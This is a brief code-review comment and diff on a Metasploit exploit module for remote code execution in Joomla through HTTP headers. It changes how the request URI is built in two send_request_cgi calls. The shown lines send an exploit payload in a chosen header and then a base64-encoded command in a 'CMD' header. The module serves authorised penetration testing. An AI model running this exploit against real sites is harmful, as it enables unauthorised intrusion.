use target_uri.path

Author: firefart

modules/exploits/multi/http/joomla_http_header_rce.rb

@@ -120,13 +120,13 @@ def exploit
     print_status("Sending payload ...")
     res = send_request_cgi({
       'method'    => 'GET',
-      'uri'       => target_uri.to_s,
+      'uri'       => target_uri.path,
       'headers' => { datastore['HEADER'] => get_payload }
     })
     session_cookie = res.get_cookies
     res = send_request_cgi({
       'method'    => 'GET',
-      'uri'       => target_uri.to_s,
+      'uri'       => target_uri.path,
       'cookie'   => session_cookie,
       'headers' => {
         'CMD' => Rex::Text.encode_base64(payload.encoded)